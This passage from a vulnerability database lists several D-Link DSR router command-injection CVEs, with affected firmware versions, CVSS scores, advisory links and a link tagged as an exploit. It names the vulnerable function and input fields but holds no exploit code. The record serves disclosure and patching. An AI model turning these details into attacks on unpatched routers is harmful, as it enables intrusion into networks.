              "matchCriteriaId": "AFF423A8-2E0B-4618-B384-5C97B4315B88",
              "vulnerable": false
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ],
      "operator": "AND"
    },
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:o:dlink:dsr-1000n_firmware:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "82F0849C-8622-4839-BE2B-DCDE9CE7B257",
              "versionEndIncluding": "3.17",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        },
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:h:dlink:dsr-1000n:-:*:*:*:*:*:*:*",
              "matchCriteriaId": "3CE07EC6-89F9-4E76-A5CE-B8EA28727F9A",
              "vulnerable": false
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ],
      "operator": "AND"
    },
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:o:dlink:dsr-1000ac_firmware:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "E7F64A55-D6BF-4440-8336-22E5C1BF36D0",
              "versionEndIncluding": "3.17",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        },
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:h:dlink:dsr-1000ac:-:*:*:*:*:*:*:*",
              "matchCriteriaId": "3DD4F77B-72B4-4261-884C-8F17B52A4643",
              "vulnerable": false
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ],
      "operator": "AND"
    }
  ],
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "An issue was discovered on D-Link DSR-250 3.17 devices. Certain functionality in the Unified Services Router web interface could allow an authenticated attacker to execute arbitrary commands, due to a lack of validation of inputs provided in multipart HTTP POST requests."
    },
    {
      "lang": "es",
      "value": "Se detect\u00f3 un problema en los dispositivos D-Link DSR-250 versi\u00f3n 3.17. Determinada funcionalidad en la interfaz web Unified Services Router podr\u00eda permitir a un atacante autenticado ejecutar comandos arbitrarios, debido a una falta de comprobaci\u00f3n de entradas proporcionadas en peticiones HTTP POST de m\u00faltiples partes."
    }
  ],
  "id": "CVE-2020-25759",
  "lastModified": "2024-11-21T05:18:41.377",
  "metrics": {
    "cvssMetricV2": [
      {
        "acInsufInfo": false,
        "baseSeverity": "HIGH",
        "cvssData": {
          "accessComplexity": "LOW",
          "accessVector": "NETWORK",
          "authentication": "SINGLE",
          "availabilityImpact": "COMPLETE",
          "baseScore": 9.0,
          "confidentialityImpact": "COMPLETE",
          "integrityImpact": "COMPLETE",
          "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C",
          "version": "2.0"
        },
        "exploitabilityScore": 8.0,
        "impactScore": 10.0,
        "obtainAllPrivilege": false,
        "obtainOtherPrivilege": false,
        "obtainUserPrivilege": false,
        "source": "nvd@nist.gov",
        "type": "Primary",
        "userInteractionRequired": false
      }
    ],
    "cvssMetricV31": [
      {
        "cvssData": {
          "attackComplexity": "LOW",
          "attackVector": "NETWORK",
          "availabilityImpact": "HIGH",
          "baseScore": 8.8,
          "baseSeverity": "HIGH",
          "confidentialityImpact": "HIGH",
          "integrityImpact": "HIGH",
          "privilegesRequired": "LOW",
          "scope": "UNCHANGED",
          "userInteraction": "NONE",
          "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
          "version": "3.1"
        },
        "exploitabilityScore": 2.8,
        "impactScore": 5.9,
        "source": "nvd@nist.gov",
        "type": "Primary"
      }
    ]
  },
  "published": "2020-12-15T20:15:16.307",
  "references": [
    {
      "source": "cve@mitre.org",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "https://supportannouncement.us.dlink.com/announcement/publication.aspx?name=SAP10195"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Third Party Advisory"
      ],
      "url": "https://www.digitaldefense.com/news/zero-day-vuln-d-link-vpn-routers/"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "https://www.dlink.com/en/security-bulletin"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "https://supportannouncement.us.dlink.com/announcement/publication.aspx?name=SAP10195"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Third Party Advisory"
      ],
      "url": "https://www.digitaldefense.com/news/zero-day-vuln-d-link-vpn-routers/"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "https://www.dlink.com/en/security-bulletin"
    }
  ],
  "sourceIdentifier": "cve@mitre.org",
  "vulnStatus": "Modified",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-20"
        },
        {
          "lang": "en",
          "value": "CWE-78"
        }
      ],
      "source": "nvd@nist.gov",
      "type": "Primary"
    }
  ]
}

Vulnerability from fkie_nvd
Published
2013-12-19 04:24
Modified
2025-04-11 00:51
Severity ?
Summary
The runShellCmd function in systemCheck.htm in D-Link DSR-150 with firmware before 1.08B44; DSR-150N with firmware before 1.05B64; DSR-250 and DSR-250N with firmware before 1.08B44; and DSR-500, DSR-500N, DSR-1000, and DSR-1000N with firmware before 1.08B77 allows remote attackers to execute arbitrary commands via shell metacharacters in the (1) "Ping or Trace an IP Address" or (2) "Perform a DNS Lookup" section.
Impacted products
Vendor Product Version
dlink dsr-500_firmware *
dlink dsr-500_firmware 1.02b11
dlink dsr-500_firmware 1.02b25
dlink dsr-500_firmware 1.03b12
dlink dsr-500_firmware 1.03b23
dlink dsr-500_firmware 1.03b27
dlink dsr-500_firmware 1.03b36
dlink dsr-500_firmware 1.03b43
dlink dsr-500_firmware 1.04b58
dlink dsr-500_firmware 1.06b43
dlink dsr-500_firmware 1.06b53
dlink dsr-500 -
dlink dsr-150n_firmware *
dlink dsr-150n -
dlink dsr-250n_firmware *
dlink dsr-250n_firmware 1.01b46
dlink dsr-250n_firmware 1.01b56
dlink dsr-250n_firmware 1.05b20
dlink dsr-250n_firmware 1.05b53
dlink dsr-250n_firmware 1.08b31
dlink dsr-250n -
dlink dsr-1000_firmware *
dlink dsr-1000_firmware 1.01b50
dlink dsr-1000_firmware 1.02b11
dlink dsr-1000_firmware 1.02b25
dlink dsr-1000_firmware 1.03b12
dlink dsr-1000_firmware 1.03b23
dlink dsr-1000_firmware 1.03b27
dlink dsr-1000_firmware 1.03b36
dlink dsr-1000_firmware 1.03b43
dlink dsr-1000_firmware 1.04b58
dlink dsr-1000_firmware 1.06b43
dlink dsr-1000_firmware 1.06b53
dlink dsr-1000 -
dlink dsr-150_firmware *
dlink dsr-150_firmware 1.05b29
dlink dsr-150_firmware 1.05b35
dlink dsr-150_firmware 1.05b46
dlink dsr-150_firmware 1.05b50
dlink dsr-150 -
dlink dsr-250_firmware *
dlink dsr-250_firmware 1.01b46
dlink dsr-250_firmware 1.01b56
dlink dsr-250_firmware 1.05b20
dlink dsr-250_firmware 1.05b53
dlink dsr-250_firmware 1.08b31
dlink dsr-250 -
dlink dsr-1000n_firmware *
dlink dsr-1000n_firmware 1.01b50
dlink dsr-1000n_firmware 1.02b11
dlink dsr-1000n_firmware 1.02b25
dlink dsr-1000n_firmware 1.03b12
dlink dsr-1000n_firmware 1.03b23
dlink dsr-1000n_firmware 1.03b27
dlink dsr-1000n_firmware 1.03b36
dlink dsr-1000n_firmware 1.03b43
dlink dsr-1000n_firmware 1.04b58
dlink dsr-1000n_firmware 1.06b43
dlink dsr-1000n_firmware 1.06b53
dlink dsr-1000n -
dlink dsr-500n_firmware *
dlink dsr-500n_firmware 1.02b11
dlink dsr-500n_firmware 1.02b25
dlink dsr-500n_firmware 1.03b12
dlink dsr-500n_firmware 1.03b23
dlink dsr-500n_firmware 1.03b27
dlink dsr-500n_firmware 1.03b36
dlink dsr-500n_firmware 1.03b43
dlink dsr-500n_firmware 1.04b58
dlink dsr-500n_firmware 1.06b43
dlink dsr-500n_firmware 1.06b53
dlink dsr-500n -



{
  "configurations": [
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:o:dlink:dsr-500_firmware:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "2616EA9D-842A-4C08-BEC0-DD0DE15627C4",
              "versionEndIncluding": "1.08b51",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:o:dlink:dsr-500_firmware:1.02b11:*:*:*:*:*:*:*",
              "matchCriteriaId": "86F457CD-2B3A-4571-941B-CEEAD52635C3",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:o:dlink:dsr-500_firmware:1.02b25:*:*:*:*:*:*:*",
              "matchCriteriaId": "7D5FB42D-B664-4CD1-A9BE-BEEB3D2455F6",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:o:dlink:dsr-500_firmware:1.03b12:*:*:*:*:*:*:*",
              "matchCriteriaId": "0836B735-04EB-46DA-A5FD-918CF254DC6D",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:o:dlink:dsr-500_firmware:1.03b23:*:*:*:*:*:*:*",
              "matchCriteriaId": "C40D5762-D950-4C59-8E60-AD63A5C4F43E",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:o:dlink:dsr-500_firmware:1.03b27:*:*:*:*:*:*:*",
              "matchCriteriaId": "CD052065-A62C-4E77-AF30-A7BFE87BEF0D",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:o:dlink:dsr-500_firmware:1.03b36:*:*:*:*:*:*:*",
              "matchCriteriaId": "84589477-A03F-4350-8F48-AA65A3E2F8EB",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:o:dlink:dsr-500_firmware:1.03b43:*:*:*:*:*:*:*",
              "matchCriteriaId": "73B9957F-92B8-471A-90C1-541857228220",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:o:dlink:dsr-500_firmware:1.04b58:*:*:*:*:*:*:*",
              "matchCriteriaId": "BB19EF7D-8CDD-4640-B272-2B31C6C8DC40",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:o:dlink:dsr-500_firmware:1.06b43:*:*:*:*:*:*:*",
              "matchCriteriaId": "D3DE0EAD-26FE-4A08-8B3F-94B7B46B3EE2",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:o:dlink:dsr-500_firmware:1.06b53:*:*:*:*:*:*:*",
              "matchCriteriaId": "3EEC400B-B9A7-4672-98BB-57EE722FDDBB",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        },
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:h:dlink:dsr-500:-:*:*:*:*:*:*:*",
              "matchCriteriaId": "ABF00635-340E-4116-8B4A-46138C13C9C3",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ],
      "operator": "AND"
    },
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:o:dlink:dsr-150n_firmware:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "F2655D2C-0A71-4F14-8CB6-9A8E5B0BA2D2",
              "versionEndIncluding": "1.05b48",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        },
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:h:dlink:dsr-150n:-:*:*:*:*:*:*:*",
              "matchCriteriaId": "729C8468-E3D3-4089-B095-A41C719E9F8C",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ],
      "operator": "AND"
    },
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:o:dlink:dsr-250n_firmware:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "F8875595-6A45-41F4-BD4F-88E4B01987FB",
              "versionEndIncluding": "1.08b39",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:o:dlink:dsr-250n_firmware:1.01b46:*:*:*:*:*:*:*",
              "matchCriteriaId": "4D87E55E-8FB9-46DD-B7E3-0FF5844AACCE",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:o:dlink:dsr-250n_firmware:1.01b56:*:*:*:*:*:*:*",
              "matchCriteriaId": "7054BD9D-2CBD-4EB2-A52C-6EAD0DF16CEA",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:o:dlink:dsr-250n_firmware:1.05b20:*:*:*:*:*:*:*",
              "matchCriteriaId": "7C7D6C20-02AB-45C2-8DF6-7406EF4B9E09",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:o:dlink:dsr-250n_firmware:1.05b53:*:*:*:*:*:*:*",
              "matchCriteriaId": "20584156-C553-4AEA-A19C-A4BB67B5390A",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:o:dlink:dsr-250n_firmware:1.08b31:*:*:*:*:*:*:*",
              "matchCriteriaId": "1CB44CCA-AC5E-4169-A4DA-8873C1435C04",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        },
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:h:dlink:dsr-250n:-:*:*:*:*:*:*:*",
              "matchCriteriaId": "E8754060-E58E-4A9A-AB59-0279E8BC793A",
              "vulnerable": false
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ],
      "operator": "AND"
    },
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:o:dlink:dsr-1000_firmware:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "8A6B7598-20C1-4F1A-BFA8-16C66D210216",
              "versionEndIncluding": "1.08b51",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:o:dlink:dsr-1000_firmware:1.01b50:*:*:*:*:*:*:*",
              "matchCriteriaId": "6F9A4E2D-8F74-4CD3-85F0-5DA4749B0F9F",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:o:dlink:dsr-1000_firmware:1.02b11:*:*:*:*:*:*:*",
              "matchCriteriaId": "2DA26493-2F60-41C1-9563-75FAA116DBA2",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:o:dlink:dsr-1000_firmware:1.02b25:*:*:*:*:*:*:*",
              "matchCriteriaId": "4D5BA908-B289-4917-8AE3-E57DACB93501",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:o:dlink:dsr-1000_firmware:1.03b12:*:*:*:*:*:*:*",
              "matchCriteriaId": "9B94BCF9-13FC-4930-92A4-6AF97699672B",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:o:dlink:dsr-1000_firmware:1.03b23:*:*:*:*:*:*:*",
              "matchCriteriaId": "F1AED08D-47B4-4A13-8291-2E49AEB1B69F",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:o:dlink:dsr-1000_firmware:1.03b27:*:*:*:*:*:*:*",
              "matchCriteriaId": "2904D8F1-633D-4DF8-9808-2961998CE510",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:o:dlink:dsr-1000_firmware:1.03b36:*:*:*:*:*:*:*",
              "matchCriteriaId": "FE195794-EDE9-477A-9934-8CE2ED1B19E7",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:o:dlink:dsr-1000_firmware:1.03b43:*:*:*:*:*:*:*",
              "matchCriteriaId": "BC8C2F15-6867-4647-9D2F-8F3D9F3054DD",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:o:dlink:dsr-1000_firmware:1.04b58:*:*:*:*:*:*:*",
              "matchCriteriaId": "AFF08CD6-A360-4291-8159-DB2A07B8F2A6",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:o:dlink:dsr-1000_firmware:1.06b43:*:*:*:*:*:*:*",
              "matchCriteriaId": "DDDBCCF6-71B8-45A8-86C4-97B622793179",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:o:dlink:dsr-1000_firmware:1.06b53:*:*:*:*:*:*:*",
              "matchCriteriaId": "FF0BFC1A-B6DF-4D2E-9DD9-566E20CAD172",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        },
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:h:dlink:dsr-1000:-:*:*:*:*:*:*:*",
              "matchCriteriaId": "AFF423A8-2E0B-4618-B384-5C97B4315B88",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ],
      "operator": "AND"
    },
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:o:dlink:dsr-150_firmware:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "83CA3AD5-8BB3-4C52-B1D4-57F24C7E3ECE",
              "versionEndIncluding": "1.08b29",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:o:dlink:dsr-150_firmware:1.05b29:*:*:*:*:*:*:*",
              "matchCriteriaId": "EDDC40C8-1BB2-4151-BAA4-E28C5AC94654",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:o:dlink:dsr-150_firmware:1.05b35:*:*:*:*:*:*:*",
              "matchCriteriaId": "ADB61873-D7C7-400D-AAA3-5F65F459B573",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:o:dlink:dsr-150_firmware:1.05b46:*:*:*:*:*:*:*",
              "matchCriteriaId": "2AD638F5-3A13-45D2-A343-1733611C5173",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:o:dlink:dsr-150_firmware:1.05b50:*:*:*:*:*:*:*",
              "matchCriteriaId": "9A27097B-44CF-47FB-90D1-0D244209E9DC",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        },
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:h:dlink:dsr-150:-:*:*:*:*:*:*:*",
              "matchCriteriaId": "2F9246BA-7F85-4564-B1B5-03BBBF9E2F35",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ],
      "operator": "AND"
    },
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:o:dlink:dsr-250_firmware:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "1F360917-0D86-4B7C-8699-EAE3A5155DAD",
              "versionEndIncluding": "1.08b39",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:o:dlink:dsr-250_firmware:1.01b46:*:*:*:*:*:*:*",
              "matchCriteriaId": "91015BD6-F1EF-4E77-991E-5A895DF204FB",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:o:dlink:dsr-250_firmware:1.01b56:*:*:*:*:*:*:*",
              "matchCriteriaId": "36443128-6668-4FB6-9B96-1C695EB5B0BD",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:o:dlink:dsr-250_firmware:1.05b20:*:*:*:*:*:*:*",
              "matchCriteriaId": "11E46972-D923-4AB7-BC2E-49D9DBC65202",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:o:dlink:dsr-250_firmware:1.05b53:*:*:*:*:*:*:*",
              "matchCriteriaId": "71900351-AF65-4AFB-A77E-361075583F43",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:o:dlink:dsr-250_firmware:1.08b31:*:*:*:*:*:*:*",
              "matchCriteriaId": "0540F822-7F53-4282-A480-6E4A15994AF8",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        },
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:h:dlink:dsr-250:-:*:*:*:*:*:*:*",
              "matchCriteriaId": "702F0FE2-5E5A-4E2B-8B7A-A0C84FF74F4E",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ],
      "operator": "AND"
    },
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:o:dlink:dsr-1000n_firmware:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "289208CD-49AB-48A8-AD2E-BF4AFA479990",
              "versionEndIncluding": "1.08b51",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:o:dlink:dsr-1000n_firmware:1.01b50:*:*:*:*:*:*:*",
              "matchCriteriaId": "0FA9027F-9EBE-45FB-8128-E1E27F1B12EF",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:o:dlink:dsr-1000n_firmware:1.02b11:*:*:*:*:*:*:*",
              "matchCriteriaId": "90E36C7E-02A1-4389-A706-B73D6C236E50",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:o:dlink:dsr-1000n_firmware:1.02b25:*:*:*:*:*:*:*",
              "matchCriteriaId": "D5146B3C-CC4C-49C4-9B8B-BF9FC3E45293",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:o:dlink:dsr-1000n_firmware:1.03b12:*:*:*:*:*:*:*",
              "matchCriteriaId": "79117184-9444-443B-9CF8-F4D2E19413A3",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:o:dlink:dsr-1000n_firmware:1.03b23:*:*:*:*:*:*:*",
              "matchCriteriaId": "AD92EB60-B33E-4653-BE5B-449DC18E073F",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:o:dlink:dsr-1000n_firmware:1.03b27:*:*:*:*:*:*:*",
              "matchCriteriaId": "DAE86995-60E0-4F50-A008-EBB227CC4207",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:o:dlink:dsr-1000n_firmware:1.03b36:*:*:*:*:*:*:*",
              "matchCriteriaId": "9B6BA51E-FCC6-4BCC-A4FF-AF49602C6D5C",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:o:dlink:dsr-1000n_firmware:1.03b43:*:*:*:*:*:*:*",
              "matchCriteriaId": "484A7789-9A84-4E01-B7C8-97FC769D21AA",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:o:dlink:dsr-1000n_firmware:1.04b58:*:*:*:*:*:*:*",
              "matchCriteriaId": "592C6173-8084-4857-AD6A-DDF9F66CE881",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:o:dlink:dsr-1000n_firmware:1.06b43:*:*:*:*:*:*:*",
              "matchCriteriaId": "A8025D5C-331B-4A62-9A0D-29EA63E7AB30",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:o:dlink:dsr-1000n_firmware:1.06b53:*:*:*:*:*:*:*",
              "matchCriteriaId": "2987ACFB-FE89-4901-8A64-B5B61F4D4EE1",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        },
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:h:dlink:dsr-1000n:-:*:*:*:*:*:*:*",
              "matchCriteriaId": "3CE07EC6-89F9-4E76-A5CE-B8EA28727F9A",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ],
      "operator": "AND"
    },
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:o:dlink:dsr-500n_firmware:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "CA8E760B-FBD1-4949-9E7C-35E216094B58",
              "versionEndIncluding": "1.08b51",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:o:dlink:dsr-500n_firmware:1.02b11:*:*:*:*:*:*:*",
              "matchCriteriaId": "F0478AA5-8740-4458-855A-11804597FA6C",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:o:dlink:dsr-500n_firmware:1.02b25:*:*:*:*:*:*:*",
              "matchCriteriaId": "A6009D02-5CE9-4D08-8C6A-005F66ED8A29",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:o:dlink:dsr-500n_firmware:1.03b12:*:*:*:*:*:*:*",
              "matchCriteriaId": "2DBC6011-8C8A-4EAA-8B6B-933C128E7A97",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:o:dlink:dsr-500n_firmware:1.03b23:*:*:*:*:*:*:*",
              "matchCriteriaId": "540C7261-9352-4CF1-BCF8-13615EFB7C4E",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:o:dlink:dsr-500n_firmware:1.03b27:*:*:*:*:*:*:*",
              "matchCriteriaId": "31C51D13-005D-4CB0-AB05-D38CC4E5096B",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:o:dlink:dsr-500n_firmware:1.03b36:*:*:*:*:*:*:*",
              "matchCriteriaId": "4C3F3332-EEE2-492F-9585-62E4256ECBC5",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:o:dlink:dsr-500n_firmware:1.03b43:*:*:*:*:*:*:*",
              "matchCriteriaId": "0DE1C593-B0E7-4715-9AA5-CF7A3A87F05E",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:o:dlink:dsr-500n_firmware:1.04b58:*:*:*:*:*:*:*",
              "matchCriteriaId": "2D4D1637-5291-45CD-BA6A-B71D9199F0F2",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:o:dlink:dsr-500n_firmware:1.06b43:*:*:*:*:*:*:*",
              "matchCriteriaId": "25136989-A83E-4C65-A354-8A0E2101EE26",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:o:dlink:dsr-500n_firmware:1.06b53:*:*:*:*:*:*:*",
              "matchCriteriaId": "36E387CF-AAE4-4EED-A7E2-6D2FE9B5933F",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        },
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:h:dlink:dsr-500n:-:*:*:*:*:*:*:*",
              "matchCriteriaId": "4B085DCB-4804-43ED-8634-0B4EB8DCD750",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ],
      "operator": "AND"
    }
  ],
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "The runShellCmd function in systemCheck.htm in D-Link DSR-150 with firmware before 1.08B44; DSR-150N with firmware before 1.05B64; DSR-250 and DSR-250N with firmware before 1.08B44; and DSR-500, DSR-500N, DSR-1000, and DSR-1000N with firmware before 1.08B77 allows remote attackers to execute arbitrary commands via shell metacharacters in the (1) \"Ping or Trace an IP Address\" or (2) \"Perform a DNS Lookup\" section."
    },
    {
      "lang": "es",
      "value": "La funci\u00f3n runShellCmd en systemCheck.htm en D-Link DSR-150 con firmware anterior a 1.08B44; DSR-150N con firmware anterior a 1.05B64; DSR-250 y DSR-250N con firmware anterior a 1.08B44; y DSR-500, DSR-500N, DSR-1000, y DSR-1000N con firmware anterior a 1.08B77 permite a atacantes remotos ejecutar comandos arbitrarios a trav\u00e9s de metacaracteres de la consola en la secci\u00f3n (1) \"Ping or Trace an IP Address\" o (2) \"Perform a DNS Lookup\"."
    }
  ],
  "id": "CVE-2013-5946",
  "lastModified": "2025-04-11T00:51:21.963",
  "metrics": {
    "cvssMetricV2": [
      {
        "acInsufInfo": false,
        "baseSeverity": "HIGH",
        "cvssData": {
          "accessComplexity": "LOW",
          "accessVector": "NETWORK",
          "authentication": "NONE",
          "availabilityImpact": "COMPLETE",
          "baseScore": 10.0,
          "confidentialityImpact": "COMPLETE",
          "integrityImpact": "COMPLETE",
          "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
          "version": "2.0"
        },
        "exploitabilityScore": 10.0,
        "impactScore": 10.0,
        "obtainAllPrivilege": false,
        "obtainOtherPrivilege": false,
        "obtainUserPrivilege": false,
        "source": "nvd@nist.gov",
        "type": "Primary",
        "userInteractionRequired": false
      }
    ]
  },
  "published": "2013-12-19T04:24:51.930",
  "references": [
    {
      "source": "cve@mitre.org",
      "url": "http://tsd.dlink.com.tw/temp/PMD/12879/DSR-500_500N_1000_1000N_A1_Release_Notes_FW_v1.08B77_WW.pdf"
    },
    {
      "source": "cve@mitre.org",
      "url": "http://tsd.dlink.com.tw/temp/PMD/12960/DSR-150N_A2_Release_Notes_FW_v1.05B64_WW.pdf"
    },
    {
      "source": "cve@mitre.org",
      "url": "http://tsd.dlink.com.tw/temp/PMD/12966/DSR-150_A1_A2_Release_Notes_FW_v1.08B44_WW.pdf"
    },
    {
      "source": "cve@mitre.org",
      "url": "http://tsd.dlink.com.tw/temp/PMD/13039/DSR-250_250N_A1_A2_Release_Notes_FW_v1.08B44_WW_RU.pdf"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Exploit"
      ],
      "url": "http://www.exploit-db.com/exploits/30061"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://tsd.dlink.com.tw/temp/PMD/12879/DSR-500_500N_1000_1000N_A1_Release_Notes_FW_v1.08B77_WW.pdf"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://tsd.dlink.com.tw/temp/PMD/12960/DSR-150N_A2_Release_Notes_FW_v1.05B64_WW.pdf"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://tsd.dlink.com.tw/temp/PMD/12966/DSR-150_A1_A2_Release_Notes_FW_v1.08B44_WW.pdf"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://tsd.dlink.com.tw/temp/PMD/13039/DSR-250_250N_A1_A2_Release_Notes_FW_v1.08B44_WW_RU.pdf"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Exploit"
      ],
      "url": "http://www.exploit-db.com/exploits/30061"
    }
  ],
  "sourceIdentifier": "cve@mitre.org",
  "vulnStatus": "Deferred",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-78"
        }
      ],
      "source": "nvd@nist.gov",
      "type": "Primary"
    }
  ]
}

Vulnerability from fkie_nvd
Published
2021-02-02 14:15
Modified
2024-11-21 05:08
Severity ?
Summary
The D-Link DSR-250 (3.14) and DSR-1000N (2.11B201) UPnP service contains a command injection vulnerability, which can cause remote command execution.
Impacted products
Vendor Product Version
